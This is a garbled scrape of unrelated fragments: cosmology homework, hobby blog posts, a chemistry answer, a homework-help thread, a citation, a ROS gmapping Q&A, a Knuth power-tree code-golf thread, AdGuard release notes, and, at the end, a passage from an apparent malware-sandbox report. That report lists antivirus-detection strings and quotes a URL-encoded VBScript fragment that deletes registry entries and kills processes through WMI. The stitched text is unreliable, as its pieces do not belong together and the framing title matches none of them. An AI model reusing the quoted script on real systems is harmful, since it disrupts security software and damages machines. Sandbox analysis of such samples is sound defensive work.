For any collection of particles the energy density is given by $$\rho = \bar E n$$ where $$\bar E$$ is the average energy of the particles. For massless particles, $$E = pc$$ so $$E \propto 1/a$$ for each particle so we also know that $$\bar E \propto 1/a$$. As long as particles are not being destroyed, just like for the non-relativistic particles, $$n \propto 1/a^3$$. Putting this together, for relativistic particles we have $$\rho \propto a^{-4}$$. In the WMAP graphic, Photons and Neutrinos both count as radiation. Photons are the clearest case since, as they have no mass, their kinetic energy is always much greater than their rest-mass energy. Neutrinos are subatomic particles that do have a small amount of mass, but for much of the history of the universe we expect that these particles have much greater kinetic energy than rest-mass energy and hence qualify as radiation.
#### The Cosmological Constant
It is a logical possibility, consistent with Einstein's equations, that there is an energy density associated with space itself; i.e., a certain amount of energy in every cubic centimeter, an amount that does not change with time. Thus, by definition, for a cosmological constant the mass-energy density is independent of the scale factor: $$\rho \propto a^0$$. As we will see, there is evidence supporting the existence of a non-zero cosmological constant. Einstein considered this possibility early on as a means to explain why the universe is static (as he thought it was), rather than expanding or contracting, when he introduced the cosmological constant via an additional term in his field equations.
Einstein's reasons for introducing the cosmological constant turned out to be unfounded. In 1929 Edwin Hubble reported his inferences of recession velocity and distance for a set of (relatively nearby) galaxies, that showed a roughly linear trend of increasing velocity with distance, just as one would expect from a uniform expansion. Einstein missed the opportunity to predict the discovery of the expansion of the universe, a missed opportunity he referred to as his greatest blunder.
The cosmological constant though has refused to die. There are two reasons for this. The first is due to the fact that if one tries to calculate, using quantum field theory, the energy density that is in every cubic centimeter of space from the zero-point energy of all the quantum fields, one gets an enormously large energy density, larger than observational limits by about $$10^{120}$$. This huge embarrassment of modern physics is called the cosmological constant problem.''
The second is that over the past twenty years strong evidence has emerged that the dominant contribution to the mean energy density of the universe in the current epoch is something that is behaving a lot like a cosmological constant. As we will see soon, the observational evidence comes from inferences of the relationship between distance and redshift that indicate the expansion rate is accelerating; i.e., that $$\ddot a > 0$$. Radiation and matter lead to deceleration, while a cosmological constant can produce acceleration (as you will shown in the Box below). The first claims of acceleration from redshift-distance inferences were published in 1998, and were based on observations of Type 1a supernovae. Three of those leading these efforts were awarded the Nobel Prize in Physics in 2011 for their work. The "Dark Energy" label in the WMAP graphic is a more general term than "cosmological constant." It is the general name for the component of the universe that is causing acceleration in the current epoch. A cosmological constant is a very specific kind of dark energy.
Box $$\PageIndex{2}$$
Exercise 13.2.1: Show that for an expanding universe with $$k=0$$ and only matter or radiation that $$\ddot a < 0$$.
Exercise 13.2.2: Show that for an expanding universe with $$k=0$$ and only a cosmological constant that $$\ddot a > 0$$.
#### Summary
The universe has components that change with scale factor in three different ways:
1. Non-relativistic matter, aka "Matter" has a mass-energy density $$\rho \propto a^{-3}$$,
2. Relativistic matter, aka "Radiation", has a mass-energy density $$\rho \propto a^{-4}$$, and
3. Dark Energy, whose mass-energy density evolves much more slowly; for the specific case of a cosmological constant $$\rho \propto a^0$$.
These different behaviors lead to them having different mixes over time in the history of the universe, and explain the differences in the two pie charts in the WMAP graphic. There are still neutrinos and photons around in the current epoch, but their contributions are just so small they have not been included in the graphic. Their steeper dependence on $$a$$ means that at earlier and earlier times they contributed a greater and greater share of the total mass-energy budget.
HOMEWORK Problems
Note: Unless directed otherwise, in these first 3 problems assume that $$k = 0$$ and $$\rho \propto a^{-3}$$.
Problem $$\PageIndex{1}$$
In the standard model of cosmology the universe has gone through at least three different "eras." These are the radiation-dominated era, the matter-dominated era and the dark energy-dominated era. In the radiation-dominated era, for example, more mass-energy comes from radiation than from matter or dark energy. Think about how energy density evolves with scale factor for each of these components and identify which era was first, which second and which third (that is, specify the temporal ordering). Make a sketch of $$\log(a)$$ vs. $$\log(\rho)$$ for each of the components, all on the same graph. On the graph indicate the ranges of scale factor for each of the three eras. I am only looking for something qualitatively correct here. Do not worry about having the right value of the scale factor for the transitions, just have the eras in order. Your axes need not have any numbers on them, but do indicate where on the $$log(a)$$ axis today is.
Problem $$\PageIndex{2}$$
From the time referred to in the lower pie chart in the WMAP graphic, to "TODAY", the universe has expanded by a factor of about 1100. Given that information, and assuming that over this time period there has been negligible destruction or creation of photons, atoms, and dark matter, about what fraction of the mass-energy density today is contributed by photons?
Problem $$\PageIndex{3}$$
Later we will study the epoch of "big bang nucleosynthesis" (BBN) when most of the Helium in the universe was created, as well as trace amounts of some other light elements. The scale factor was about one million times smaller in this epoch than it was at the time referred to in the lower pie chart in the WMAP graphic. Assuming that neutrino mass can be ignored between these two different times, what is the ratio of radiation mass-energy density to matter mass-energy density at the epoch of BBN?
|
|
# 2017-18 Cross over recap.
Been a long time since I’ve posted anything. Mostly busy with working on my projects. An upcoming Cube that should become pretty interesting. I’ll post about it once things actually get somewhere..This time I’m waiting until parts actually show up.
I did some handwork a few weeks ago, making some masks. Which I’ll make a full post about one of these days. This was the end product.
These I 3d printed and eventually filled, sanded and painted.
Lizard Truth is finally a small business! Registered not only just a few weeks ago. Though maybe completely useless. As the reasons for making the business fell apart. But we’ll see.
I started to design an overcomplicated and over expensive laser cutter, and I even paid for it…We’ll see if it ever ends up going anywhere. But a fun project regardless.
I’ll attempt to document my laser cutter. As I build. But not promising 😉
# Reverse Copy Huntng
So, back in the day, when I first started making this website…nearly a year now, so my host provider tells me (cause they wanna get paid) I threw up some random image (The Mary lizard) I found once while duckduckgoing “lizard truth” I couldn’t find an original creator for it. Thankfully for metadata saved in the file, aswell as it’s original file name, the original creator in an attempt to check who stole their shit was able to find my website! And instead of being a dick like most IP owners, they very politely emailed me to tell me who they were and provided me finally a link with their content up for sale. So I very gratefully updated their credit and now want to share with the rest of you This random internet persons redbubble. Please support this artist!
Thanks again HiddenStash for not being an asshole!
Oh here is their internet website
# Virtual Work
So We’ve talked about mdc equations before in math monkey. They are usually in the form $$m\: \ddot{x} + d\: \dot{x} + cx\: = 0\:$$
m Being the Mass, d the dissapation (dampening) and c the spring constants.
I won’t go into how one builds this equation up, there are many and I covered in math monkey pretty in depth on how to do it with the basic math pendel. One of these days I may get into a more indepth analysis of maybe a car or a real double pendle. Anyways, a part that wasn’t explained at all was the “Virtual Work” of the system, or namely the $Q\:$ part of the Lagrange equation
$$\mathrm{Q}=\frac{d}{dt}\frac{\delta\mathrm{L}}{\delta\mathrm{\dot{\phi}}}-\frac{\delta\mathrm{L}}{\delta\mathrm{\phi}}$$
So whats Q? Well according to wiki:
Virtual work arises in the application of the principle of least action to the study of forces and movement of a mechanical system. The work of a force acting on a particle as it moves along a displacement will be different for different displacements.
Or whatever that means. In mathemagics, it means this:
$$Q\:= \displaystyle\sum_{i=1}^{n}\mathrm{M_i(t)}\frac{\delta\phi}{\delta\mathrm{x}}+\mathrm{F_i(t)}\frac{\delta\mathrm{r}}{\delta\mathrm{x}}+\mathrm{F_{di}(t)}\frac{\delta\mathrm{r_d}}{\delta\mathrm{x}}+\mathrm{R_i(t)}\frac{\delta\mathrm{r}}{\delta\mathrm{x}}$$
Namely the Sum of the Moment, external force, friction and dampening times their directional vector components first derivative. Or Well thats what it looks like when I read it anyways. I still haven’t quite got the hang/understanding of it. But I’ve never claimed to know what I’m doing. Just that I look like I know what I’m doing 😉
Well to calculate all this out theres quite a bit of work to do. I recently had to do such a thing in a system I had to describe and while digging through my notes I happened to fall on a trick I seemed to write to myself in a exam cheatsheet. Normally, you would calculate the vectoral force (for dampening in this example) and multiple it with its directional derivative like so:
$$\mathrm{F_{di}(t)}\frac{\delta\mathrm{r_d}}{\delta\mathrm{x}}$$
F could look like this (or rather, does):
$$\mathrm{\underline{F}_{d}(t)} = -d \dot{x} \vec{e_x}$$
and r would look like maybe this:
$$\delta\mathrm{r} = x\vec{e_x} +y \vec{e_y}$$
So you can imagine there are a bunch of steps to get this done, each partial div. blah blah multiplying, blah blah.
Well good news everyone!
I guess it’s not a surprise cause I already said I found a cheat. Well here it is:
$$\mathrm{\underline{F}_{d}(t)} = -d \Delta\Delta\dot{x} = -d \Delta\dot{x}^2$$
Yay! I’ve tested this conjecture exactly once with 100% success rate. So that’s good math in my books. I wish I could credit where I found this from…but since it’s on my cheat sheet. I guess I’ll have to claim it as my own.
$\mathrm{e}^{\sqrt{2}}$
# Tentacle train
One of my “contracts” this last year was to build an animatronic tentacle for an art exhibition ( see #dokumenta14 ), While it worked well controlling with ones own hands….It barely worked well with the motors and electronics.
It’s the third week since the beginning of the exhibit I’ve been sharing with Valeria and some things have changed, been updated and the like.
First of the likes is the promised dipped skull and it’s development.
that was after 12 dips. I expected a particular kind of development, mostly that after enough layers some kind of face would be developed. Even surprisingly a nose! Though some more needs to be done…the mouth and the horn shouldn’t really be there at all.
Second of likes:
Maybe it’s part of the first likes. Either way it’s the parts that were dipped last week.
This is after the first cycle. They don’t really look spectacular in the first dippings, although you can see the skull then compared to the skull now.
Tomorrow, I will make a mother post about the upgrade to the animatronics.
$e^{\sqrt{2}}$
We had our official exhibition this past friday. Everything went pretty well, my robots didn’t explode, or burn anything down…Not that that should happen…but well, old machines can just…give up sometimes. I updated the dokumenta14 page with some photos…but here I’d like to post a video and a photo of what my robot actually does. There is also a little preview of whats to come in the following weeks.
The videos came from facebook, and Jan Hendrik Neumann, But they’re some nice videos. I may replace them later.
And for the small preview, for next week.
# Mighty Max Lives 2/3
I’ve been workin’ away on projects and being a half way good student…but terrible person. But in the meantime I’ve managed to get something done on Mighty Max. My Smoothieboard 0X showed up finally and I got straight to work on putting in in place.
|
|
# Chapter 20 - Oxidation-Reduction Reactions - 20 Assessment: 60
The Nitrogen atoms lose electrons and are turned into N$_2$ (Nitrogen gas)
#### Work Step by Step
N$_2$O$_4$ + 2N$_2$H$_4$--> 3N$_2$ + 4H$_2$O
After you claim an answer you’ll have 24 hours to send in a draft. An editor will review the submission and either publish your submission or provide feedback.
|
|
A community for students. Sign up today
Here's the question you clicked on:
anonymous one year ago Will medal and fan with testomonial (I'm so confused with this lol) What is the slope of the line passing through the points (1, –5) and (4, 1)? A. 2 B. -4/5 C.5/4 D.-2 By the way It didn't come with a graph.
• This Question is Closed
1. Nnesha
$\huge\rm \frac{ y_2-y_1 }{ x_2-x_1 }$ formula to find slope
2. Nnesha
where x's and y's are (x_1 ,y_1)(x_2 ,y_2) plug them into the formual
3. anonymous
Okay ill try that
4. Nnesha
good try it let me know what you get :=)
5. anonymous
answer is 2! thank you so much :)
6. Nnesha
right :=) yw good job!
Ask your own question
Sign Up
Find more explanations on OpenStudy
Privacy Policy
|
|
# Show Reference: "A computational study of multisensory maturation in the superior colliculus ({SC})"
A computational study of multisensory maturation in the superior colliculus (SC) Experimental Brain Research, Vol. 213, No. 2. (1 September 2011), pp. 341-349, doi:10.1007/s00221-011-2714-z by Cristiano Cuppini, Barry E. Stein, Benjamin A. Rowland, Elisa Magosso, Mauro Ursino
@article{cuppini-et-al-2011,
abstract = {Multisensory neurons in cat {SC} exhibit significant postnatal maturation. The first multisensory neurons to appear have large receptive fields ({RFs}) and cannot integrate information across sensory modalities. During the first several months of postnatal life {RFs} contract, responses become more robust and neurons develop the capacity for multisensory integration. Recent data suggest that these changes depend on both sensory experience and active inputs from association cortex. Here, we extend a computational model we developed (Cuppini et al. in Front Integr Neurosci 22: 4–6, 2010) using a limited set of biologically realistic assumptions to describe how this maturational process might take place. The model assumes that during early life, {cortical-SC} synapses are present but not active and that responses are driven by non-cortical inputs with very large {RFs}. Sensory experience is modeled by a training phase in which the network is repeatedly exposed to modality-specific and cross-modal stimuli at different locations. {Cortical-SC} synaptic weights are modified during this period as a result of Hebbian rules of potentiation and depression. The result is that {RFs} are reduced in size and neurons become capable of responding in adult-like fashion to modality-specific and cross-modal stimuli. Supported by {NIH} grants {NS036916} and {EY016716}.},
author = {Cuppini, Cristiano and Stein, Barry E. and Rowland, Benjamin A. and Magosso, Elisa and Ursino, Mauro},
day = {1},
doi = {10.1007/s00221-011-2714-z},
issn = {0014-4819},
journal = {Experimental Brain Research},
month = sep,
number = {2},
pages = {341--349},
posted-at = {2011-07-27 16:23:58},
priority = {3},
publisher = {Springer Berlin / Heidelberg},
title = {A computational study of multisensory maturation in the superior colliculus ({SC})},
url = {http://dx.doi.org/10.1007/s00221-011-2714-z},
volume = {213},
year = {2011}
}
See the CiteULike entry for more info, PDF links, BibTex etc.
The model due to Cuppini et al. develops low-level multisensory integration (spatial principle) such that integration happens only with higher-level input.
In their model, Hebbian learning leads to sharpening of receptive fields, overlap of receptive fields, and Integration through higher-cognitive input.
|
|
Gmapping is adding extra points to my map that aren't from the laser scan.
I'm running gmapping using the sick lms1xx driver for the lidar scans and wheel encoders for odometry. I'm having a problem with gmapping adding points to the map that are outside of my walls and are not reported by the laser scanner. Please see the image in the link below for details:
I've tried adjusting almost all of the parameters and I even tried filtering the laser scan message but the points don't exist in the laser scan so there isn't really anything to filter out. Hector mapping doesn't have this problem. Any thoughts on what's going on?
------- Edit: -------------
While hector mapping creates better looking maps without this issue, gmapping creates more accurate maps due to the underlying particle filter. Therefore, I would like to use gmapping over hector.
To highlight the issue even more, here are two maps, one made with hector and one with gmapping. Gmapping is adding quite a few additional points to the map that are not included in the laser scan data.
Manually looking at the laser scan data, I can see that the min range is 0.0m and the max range is 12.17m, neither is close to my 50m laser maximum and both are well below the outlier points on the map which appear to be about 25m away from the robot. I also determined that the 0.0m points are not the problem by filtering those out.
Any further help is appreciated. Thanks.
edit retag close merge delete
Sort by » oldest newest most voted
This looks fairly normal to me. Your laser is returning a max range reading, so gmapping is clearing all the way out. This could be a valid reading because of something like a window, or a spurious reading because of something like a very reflective or nonreflective surface, or an object at a very shallow angle to the beam. Multiple views of the same area may help, but if hector mapping works better for you, then use that.
more
Thanks for the comments. I've edited my original post with more information. I don't believe that my laser is receiving a maximum range reading because I can't see it in the raw message, nor is there a point shown in RVIZ for the laser measurement at the gmapping outlier points. Any other thoughts?
( 2015-03-10 18:00:38 -0500 )edit
If it's not the laser readings, I'm not sure what could be causing this. Watching the mapping progress in rviz might give some indication.
( 2015-03-10 19:04:20 -0500 )edit
Have you tried adjusting the ~maxUrange and ~maxRange parameters, and adjusting their relative values?
From the documentation:
~maxUrange (float, default: 80.0) The maximum usable range of the laser. A beam is cropped to this value. ~maxRange (float) The maximum range of the sensor. If regions with no obstacles within the range of the sensor should appear as free space in the map, set maxUrange < maximum range of the real sensor <= maxRange.
more
I had tried adjusting those parameters. They can limit the outlier points but don't define them. If I lower my max ranges to a small value like 10, then I get no outliers. If I increase it up to 100, then the points don't extend out to 100 but remain at their normal ~25m mark.
( 2015-03-11 08:36:36 -0500 )edit
How are you filtering out the 0.0m measurements? Maybe you or gmapping is setting those points to scan.range_max + 1 as in the laser scan range filter? Can you see any other conspicuous ranges, such as NaNs, infs, or -infs in the laser scan?
more
I filtered them through a script where I replace the 0's with something else. I've tried changing them to NaNs and also to something else like 40. What I discovered is that those 0's are not corresponding to the outlier points. I saw the outliers and some additional points out at 40.
( 2015-03-11 08:18:38 -0500 )edit
I believe I have found my answer. In the sensor_msgs/LaserScan Message, there are parameters range_min and range_max. Some of my laser scan ranges were coming in under the range_min value (both 0.0 and others) and those are causing the outlier points. I don't know why this is happening, but it can be fixed either by changing the data to conform to the specified max and mins, or by changing the max and mins to conform to the data.
If anyone else in the future faces this problem, you may use the code below to filter your laser scans, note that there are two options and you can comment out the first to use the second.
more
I'm using a YD Lidar and I was getting bad results in Gmapping. It was mapping area beyond walls as free space, as if it was seeing through walls. I used LaserScanRangeFilter package and replaced the min & max values with NaN. The example yaml from LRSF package shows using "inf" but "NaN" was what I needed.
Also setting maxRange and maxURange correctly (according to actual range of lidar) was necessary.
Hope this helps.
more
|
|
# Knuth's Power Tree
In The Art of Computer Programming, Knuth describes an algorithm to compute short addition chains. The algorithm works by computing a tree known as the Power Tree. The tree is rooted at 1, and each level is computed from the previous. Suppose we've computed level k. Then, for each node (n) in level k, and each ancestor (or self) a = 1, 2, ..., n of n, add the node n+a to level k+1 if it is not already in the tree; the parent of n+a is n.
Three important things to note:
• nodes should be visited in the order that they are created
• levels are to be computed one at a time (not recursively)
• traverse the ancestors from smallest to largest (or you end up a familiar, but less optimal tree)
A picture of the tree
Perhaps drawing this tree would be fun to golf? Hmm. At the least, the result would probably be a better-drawn tree. FWIW, 10 has 4 children.
1
|
2
/ \
3 4
/\ \
/ \ \
5 6 8
/ \ \\ \
/ | \\ \
/ | \\ \
7 10 9 12 16
/ / /\ \ \ \ \\
/ / / \ \ \ \ \\
14 11 13 15 20 18 24 17 32
Naive Python Implementation
Since my verbose description of the tree seems to be lacking, here's a naive Python implementation. I store the tree as a dictionary here, parent(x) := tree[x]. There's lots of fun optimization to be had here.
def chain(tree,x):
c = [x]
while x!=1:
x=tree[x]
c.append(x)
return c[::-1]
tree = {1:None}
leaves = [1]
levels = 5
for _ in range(levels):
newleaves = []
for m in leaves:
for i in chain(tree,m):
if i+m not in tree:
tree[i+m] = m
newleaves.append(i+m)
leaves = newleaves
Requirements
Your program should take one argument n, compute the complete tree with all integer nodes i with 0 <= i <= n, and then take input from the user. For each input, print out the path from the root to that input. If an input isn't an integer between 0 and n (inclusive), behavior is undefined. Terminate if the user inputs zero.
Example Session
./yourprogram 1000
?1000
1 2 3 5 10 15 25 50 75 125 250 500 1000
?79
1 2 3 5 7 14 19 38 76 79
?631
1 2 3 6 12 24 48 49 97 194 388 437 631
?512
1 2 4 8 16 32 64 128 256 512
?997
1 2 3 5 7 14 28 31 62 124 248 496 501 997
?0
• Please note: a tree of size n may not contain all numbers up to n. – Howard Jul 15 '11 at 8:11
• Is it a requirement to compute the /complete/ tree even though the output does not require all that information? – Thomas Eding Jul 24 '11 at 7:46
• Yeah, MtnViewMark's solution does not comply with that requirement. – boothby Jul 25 '11 at 7:32
• That interpretation of the requirement excludes any lazy language. Since the program doesn't actually use the complete tree, nothing will ever cause the computation to happen. See my expanded solution notes. I suppose one could compel a lazy language to write those results to /dev/null... but why? – MtnViewMark Jul 26 '11 at 2:57
### Ruby, 172148139 137 characters
P={1=>[1]}
a=->k{P[k].map{|t|P[k+t]||=P[k]+[k+t]}}
P.keys.map{|v|a[v]}until(1..$*[0].to_i).all?{|u|P[u]} STDIN.map{|l|p P[l.to_i]||break} Most of the code is for input and output. Building the tree is only a few chars (lines 1-2). The tree is represented by a hash where key is the node and value its path to root. Since a tree of size n may not contain all numbers up to n we continuously add more levels until all numbers up to n are present in the tree. For the example given above: >1000 [1, 2, 3, 5, 10, 15, 25, 50, 75, 125, 250, 500, 1000] >79 [1, 2, 3, 5, 7, 14, 19, 38, 76, 79] >631 [1, 2, 3, 6, 12, 24, 48, 49, 97, 194, 388, 437, 631] >512 [1, 2, 4, 8, 16, 32, 64, 128, 256, 512] >0 Edit 1: Now the hash contains the path for each node as value already and therefore there is no need to build the path each time. Edit 2: Changed the break condition for the final loop. Edit 3: Changed the condition for the build-loop. ## Haskell, 174 185195 characters (%)=lookup t(n,w)=map(\m->(n+m,n+m:w))w _#0=return() k#n=maybe(foldr(\e@(i,_)r->maybe(e:r)(\_->r)$i%r)k(k>>=t)#n)((>>main).print.reverse)$n%k main=getLine>>=([(1,[1])]#).read This version actually totally ignores the argument, and calculates the tree incrementally on demand. 1000 [1,2,3,5,10,15,25,50,75,125,250,500,1000] 79 [1,2,3,5,7,14,19,38,76,79] 631 [1,2,3,6,12,24,48,49,97,194,388,437,631] 512 [1,2,4,8,16,32,64,128,256,512] 997 [1,2,3,5,7,14,28,31,62,124,248,496,501,997] 0 Oh look! There wasn't any requirement to output a prompt. So now the code doesn't. • Edit (195 → 185): combined main and i • Edit (185 → 174): removed prompt ## Ungolf'd Here is an expanded version of the core computation: type KPTree = [(Int, [Int])] -- an association from numbers to their ancester chains -- ancester chains are stored biggest to smallest -- the associations are ordered as in the tree, reading right to left, -- from the lowest level up kptLevels :: [KPTree] kptLevels = [(1,[1])] : map expand kptLevels -- a list of successive KPTrees, each one level deeper than the last where expand tree = foldr addIfMissing tree (concatMap nextLeaves tree) addIfMissing e@(n,_) tree = maybe (e:tree) (const tree)$ lookup n tree
nextLeaves (n,w) = map (\m -> (n+m, n+m:w)) w
kptPath :: Int -> [Int]
kptPath n = findIn kptLevels
-- find the ancestor chain for a given number
where
findIn (k:ks) = maybe (findIn ks) id $lookup n k To illustrate the strangeness of how to apply the pre-computation requirement to a lazy language, consider this version of main: kptComputeAllTo :: Int -> [[Int]] kptComputeAllTo n = map kptPath [1..n] -- compute all the paths for the first n integers main :: IO () main = do n <- (read . head) fmap getArgs go$ kptComputeAllTo n
where
go preComputedResults = loop
where
loop = getLine >>= process . read
process 0 = return ()
process i = (print $reverse$ preComputedResults !! (i - 1)) >> loop
Even thought it builds an array of the results for the first n integers, only those that are used are ever actually computed! Here's how fast it runs with 50 million as an argument:
> (echo 1000; echo 0) | time ./3177-PowerTree 50000000
[1,2,3,5,10,15,25,50,75,125,250,500,1000]
0.09 real 0.07 user 0.00 sys
• This doesn't compute the complete tree with n nodes. – boothby Jul 25 '11 at 7:33
• It wasn't clear how to apply the requirements to a lazy language. Usually, an input value like this is given as a help so solutions can just allocate a fixed array. Solutions in dynamic languages often ignore such input (or limits in the spec). I took the input to be a hint to the program as a bound on subsequent inputs. Indeed a program that meets the input/output requirements of this problem needn't use it at all. Typically, code-golf doesn't mandate how the internals achieve the results. – MtnViewMark Jul 26 '11 at 1:58
• Fascinating. What kind of runtime do you get to compute the chain for 50M? The algorithm Knuth describes is O(n lg n) time and 2n+lg n space. – boothby Jul 26 '11 at 7:08
• The algorithm used was aiming for code-golf, not time efficiency: It is roughly O(n^3 lg n) in time, though oddly only O(n) in space. On my somewhat aging CPU, it can compute the chain for 10k in 9.58s, or just about 100x the time it took to compute the chain for 1k. I'm pretty sure computing the chain for 50M wouldn't be possible with this code. – MtnViewMark Jul 27 '11 at 4:31
• So, that's why I make the requirement that you compute the whole tree. The point of code-golf (IMO) is to satisfy all requirements in the smallest number of characters. If you're not satisfying all the requirements, it's a fail. – boothby Jul 27 '11 at 4:54
|
|
## College Algebra (10th Edition)
In order to count all of the elements in set A but not in set C, we have to add up the numbers that are in A, not including those which are in C. This means: $= 15 + n(A\cap B\cap C)+n(A\cap B)$ + $n(A\cap C) - n(A\cap B\cap C) - n(A\cap C)=15+n(A\cap B)=15+3=18$
|
|
## An error 1006 has occurred avast
Runtime Code happens when Avast! Antivirus fails or crashes whilst it's running, hence its name. It doesn't necessarily mean that the code. It's just that you don't know which one will work for every occurrence of this are the solutions that we think will help you get rid of Error Error (EE) Logic Error - The computer system creates incorrect information or produces a different result even though the data that is input is.
### Apologise, but: An error 1006 has occurred avast
An error 1006 has occurred avast Fatal error cannot redeclare function php TRY IF YOU HAVE HAL.DLL ERROR
### Thematic video
How To Fix Avast UI Failed To Load Error [ Working 2020 ]
## Windows Release - AdGuard versions
One of the best things about Christmas is that everyone gives each other presents! So here’s our humble gift to you: AdGuard v for Windows. We hope you’ll like it, because we put a lot of effort into its development.
This version features improved ad blocking (thanks to added support for scriptlets and new modifiers), some major networking improvements and a new option to activate AdGuard via your sprers.eu personal account.
Scriptlets is a powerful ad blocking instrument. You can say that scriptlet is an internal script (a mini-program) that we install with the app, and then execute that script with the help of filtering rules. Putting it simply, scriptlets allow us to modify how the code of the web page behaves. As for the practical use, this helps to fight adblocker circumvention, for example, and is also useful in some other cases.
[Added] $redirect and$rewrite modifiers support
They are practically the same modifiers, and they allow to substitute resources. If you are not a custom filtering rules aficionado, don't bother with it. Just know that it is yet another instrument in the hands of filter developers that helps to block ads more efficiently.
We should mention that both $redirect and$rewrite modifiers are still kind of working in test mode, but they are fully operational and you should feel free to use them.
[Improved] Proxy mode can now be used alongside automatic traffic filtering #, #
Previously, you had to choose between using AdGuard to filter all traffic on the current system, or setting it up as an HTTP proxy to funnel traffic of particular apps or devices through AdGuard (but without filtering it).
Now you can have the best of both worlds, and even more: filter application and browser traffic on the current PC and at the same time use AdGuard as a filtering proxy for other devices (yes, now their traffic will be filtered too). To select the configuration you want go to Network settings.
[Fixed] Disabling HTTPS filtering for an app works incorrectly #
[Fixed] Cookies time-to-live resets to zero #
[Fixed] Automatic apps filtering gets disabled after an app update #
[Fixed] Userscript working in pre version 7 releases not working in post version 7 releases. #
[Fixed] Cannot find the file specified #
[Fixed] Incompatibility between AdGuard and HTTP Debugger #
[Fixed] Cannot add executable from %Appdata% to the filtering #
[Fixed] Some problems with user filter #
[Fixed] Cannot add $network rules to the user filter # [Fixed] Atom package installer doesn't work when protection enabled # [Fixed] Firefox Private Network issue # [Improved] Change the approach to the way how we start cert installer # ### UI [Added] Add HTTPS filtering step to the initial wizard # [Added] Import-export advanced settings # [Added] Trial period should be started explicitly # [Changed] Checkbox for new rule is now shown as disabled in Filter editor # [Fixed] Diagonal resizing by dragging the bottom corners is flawed # [Fixed] Extra error entries in the log file # [Fixed] Filter descriptions in Filter editor lack spaces in Traditional Chinese localization # [Fixed] Main window now correctly reflects the time of the last filters update check and not the time of the last actual filters update # [Fixed] Incorrect placement of proxy configuration warning # [Fixed] UI performance drops when you use search on the “Add filter” screen # [Fixed] Main window is shown next to the settings wizard # [Fixed] Poor line break on Browsing Security screen # [Fixed] Repeated clicks on “Debug mode” in tray menu bring up the slow filtering warning # [Fixed]Buttons Collapse, Expand, Close look bad # [Fixed] Userscript is reported as updated if version contains a letter # [Fixed] Drag&Drop issue # [Fixed]Filtering log doesn't show applied rules # [Fixed] Dark theme inner window issue # [Fixed] Wrong request type in the filtering log # [Improved] Microsoft Edge Beta cannot be added to filtered app in AFW # [Improved] Remove old strings from translations # [Improved] Improve the license check window # [Improved] AdGuard Personal CA keeps coming back # [Improved] Re-design About" screen" # [Improved] There is no link to the list of changes in the latest versions # [Improved] The text is not centered on the main screen # [Improved] Use custom adguard: scheme for adding userscripts # [Improved] Hover on maximize button looks bad # [Improved] Strip identifying information from the logs when doing export # [Improved] Centering of icons in Settings # ### Networking [Changed] Legacy and regular Microsoft Edge executables separated in “Filtered Apps” # [Improved] We should check the internet availability before sending a support request # ### Other [Added] New versioning system # [Changed] Flag icons removed from the languages selector # [Changed] “Too many filters” warning now requires more enabled filters to trigger # [Fixed] Reset statistics feature works incorrectly # [Fixed] Settings reset doesn’t set window mode to its default state # [Fixed] Unable to remove Spotify from the list of filtered apps # [Fixed] Several apps with the same name can’t be added to the list of filtered apps # [Fixed] Crash after language change # [Fixed] Filters metadata is not updated for some filters # [Fixed] AdGuard occasionally doesn’t delete old log files # [Fixed] sprers.eu crashes on the app uninstall # [Fixed] File or folder is corrupted # [Improved] AdGuard GUI unnecessarily raising Windows platform timer resolution # [Improved] Transfer GM property when the user changes the userscript's name # [Improved] Improve the Advanced Settings logic # [Improved] Filter installer's crash report names # [Improved] Pass the empty parameter's value in the query string # [Improved] AdGuard now adapts its time&date format according to system settings # ### Incident Response #### MITRE ATT&CK™ Techniques Detection This report has 9 indicators that were mapped to 9 attack techniques and 6 tactics. View all details ### Indicators Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details. • Anti-Detection/Stealthyness • Possibly checks for the presence of an Antivirus engine details "Antivirus" (Indicator: "antivirus") "Pro Antivirus" (Indicator: "antivirus") "Antivirus Gratuit" (Indicator: "antivirus") "Free Antivirus" (Indicator: "antivirus") "AntiVirus FREE" (Indicator: "antivirus") "AntiVirus Gratuit" (Indicator: "antivirus") "ZoneAlarm" (Indicator: "zonealarm") "Avast Antivirus" (Indicator: "antivirus") "AntiVirusProduct" (Indicator: "antivirus") "avastAuid" (Indicator: "avast") "avastUuid" (Indicator: "avast") "avastMidex" (Indicator: "avast") "avastGuid" (Indicator: "avast") "avastPguid" (Indicator: "avast") "antiviruswarning" (Indicator: "antivirus") "avast_guid" (Indicator: "avast") "avast_auid" (Indicator: "avast") "avast_uuid" (Indicator: "avast") "Bavast! Antivirus" (Indicator: "antivirus") "AVG Antivirus" (Indicator: "antivirus") source String relevance 3/10 ATT&CK ID T (Show technique in the MITRE ATT&CK™ matrix) • Environment Awareness • Found a reference to a WMI query string known to be used for VM detection details "++++lRC+%3D+DeleteRegEntry%28sHive%2C+sEnumPath+%26+%22%5C%22+%26+sKeyName%29%0A+++Next%0A+++On+Error+Goto+0%0A+++lRC+%3D+sprers.euKey%28sHive%2C+sEnumPath%29%0A+End+If%0AEnd+Function+%0A%0AFunction+DeleteRegValue%28sHive%2C+strKeyPath%2C+strValueName%29%0A+++lRC+%3D+sprers.euValue%28+sHive%2C+strKeyPath%2C+strValueName%29%0AEnd+Function+%0A%0AFunction+KillProc%28+process%29%0A%09On+Error+Resume+Next%0A%09%27+Query+and+running+processes%0A%09Set+objWMIService+%3D+GetObject%28+%22winmgmts%3A%2F%2F.%2Froot%2Fcimv2%22+%29%0A%09%27+Display+error+number+and+description+if+applicable%0A%0A%09On+Error+GoTo+0%0A%09%27+Kill+specified+process%0A%09Set+colItems+%3D+sprers.euery%28+%22Select+*+from+Win32_Process%22%2C+%2C+48+%29%0A%09For+Each+objItem+in+colItems%0A%09%09If+LCase%28+sprers.eun+%29+%3D+LCase%28+process+%29+Then%09%09%0A%09%09%sprers.euate%0A%09%09End+If%0A%09Next%0Aend+Function%0A%0AFunction+RunProc%28+process%29%0A%09Set+wshShell+%3D+CreateObject%28+%sprers.eu" (Indicator: "win32_process"; File: "sprers.eu") 